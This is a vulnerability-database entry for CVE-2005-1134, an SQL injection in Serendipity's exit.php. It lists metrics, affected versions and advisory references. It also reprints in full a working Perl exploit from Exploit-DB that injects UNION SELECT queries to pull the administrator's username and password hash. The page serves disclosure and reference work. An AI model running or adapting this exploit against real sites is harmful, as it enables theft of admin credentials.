CVE-2005-1134 : Detail

CVE-2005-1134

1.72%V3
Network
2005-04-16
02h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in exit.php for Serendipity 0.8 and earlier allows remote attackers to execute arbitrary SQL commands via the (1) url_id or (2) entry_id parameters.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 939

Publication date : 2005-04-12 22h00 +00:00
Author : kre0n
EDB Verified : Yes

#!/usr/bin/perl # Serendipity 0.8beta4 exit.php SQL Injection exploit # (c) ADZ Security Team 2004-2005 # (c) kreon 2005 # http://adz.void.ru/ # [email protected] # Public :) print "\n\n"; print "# Serendipity 0.8beta4 exit.php SQL Injection exploit\n"; print "# (C) ADZ Security Team 2004-2005\n"; print "# (C) kreon 2005\n"; use IO::Socket; use Getopt::Std; getopt("h:d:p:t:"); $opt_p ||= 80; $opt_d ||= "/"; $opt_t ||= "serendipity_"; if(!$opt_h) { die("# Usage: $0 -h <host> [-d <dir>] [-p <port>] [-t table_prefix]\n"); } $sqlpass = "?entry_id=1&url_id=1%20UNION%20SELECT%20password%20FROM%20".$opt_t."authors%20WHERE%20userlevel=255/*"; $sqllogin = "?entry_id=1&url_id=1%20UNION%20SELECT%20username%20FROM%20".$opt_t."authors%20WHERE%20userlevel=255/*"; print "# Host: $opt_h\n"; print "# Dir: $opt_d\n"; print "# Port: $opt_p\n"; print "# Prefix: $opt_t\n"; $Q1 = "GET ".$opt_d."/exit.php".$sqllogin." HTTP/1.0\n"; $Q1 .= "Host: ".$opt_h."\n\n"; $Q2 = "GET ".$opt_d."/exit.php".$sqlpass." HTTP/1.0\n"; $Q2 .= "Host: ".$opt_h."\n\n"; $s = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can't connect!"); $s->send($Q1); $s->recv($txt, 1024); if($txt =~ m/location: (\S+)/i) { $login = $1; } $s = IO::Socket::INET->new(Proto=>'tcp', PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can't connect!"); $s->send($Q2); $s->recv($txt, 1024); if($txt =~ m/location: (\S+)/i) { $pass = $1; } if(!$login || !$pass || $login =~ m/http:\/\//i || $pass =~ m/http:\/\//i) { print "# Failed :(\n"; exit; } print "# Succeed :)\n"; print "# Login: $login\n"; print "# Pass Hash: $pass\n"; print "\n"; # milw0rm.com [2005-04-13]

Products Mentioned

Configuraton 0

S9y>>Serendipity >> Version 0.3

S9y>>Serendipity >> Version 0.4

S9y>>Serendipity >> Version 0.5

    S9y>>Serendipity >> Version 0.5_pl1

      S9y>>Serendipity >> Version 0.6

        S9y>>Serendipity >> Version 0.6_pl1

          S9y>>Serendipity >> Version 0.6_pl2

            S9y>>Serendipity >> Version 0.6_pl3

              S9y>>Serendipity >> Version 0.6_rc1

                S9y>>Serendipity >> Version 0.6_rc2

                  S9y>>Serendipity >> Version 0.7

                  S9y>>Serendipity >> Version 0.7_beta1

                    S9y>>Serendipity >> Version 0.7_beta2

                      S9y>>Serendipity >> Version 0.7_beta3

                        S9y>>Serendipity >> Version 0.7_beta4

                          S9y>>Serendipity >> Version 0.7_rc1

                            S9y>>Serendipity >> Version 0.8_beta5

                              S9y>>Serendipity >> Version 0.8_beta6

                                References

                                http://www.s9y.org/5.html
                                Tags : x_refsource_CONFIRM
                                http://www.osvdb.org/15542
                                Tags : vdb-entry, x_refsource_OSVDB
                                http://seclists.org/lists/bugtraq/2005/Apr/0195.html
                                Tags : mailing-list, x_refsource_BUGTRAQ
                                http://secunia.com/advisories/15145
                                Tags : third-party-advisory, x_refsource_SECUNIA
                                http://www.s9y.org/63.html#A9
                                Tags : x_refsource_CONFIRM
                                http://securitytracker.com/id?1013699
                                Tags : vdb-entry, x_refsource_SECTRACK
                                http://www.securityfocus.com/bid/13161
                                Tags : vdb-entry, x_refsource_BID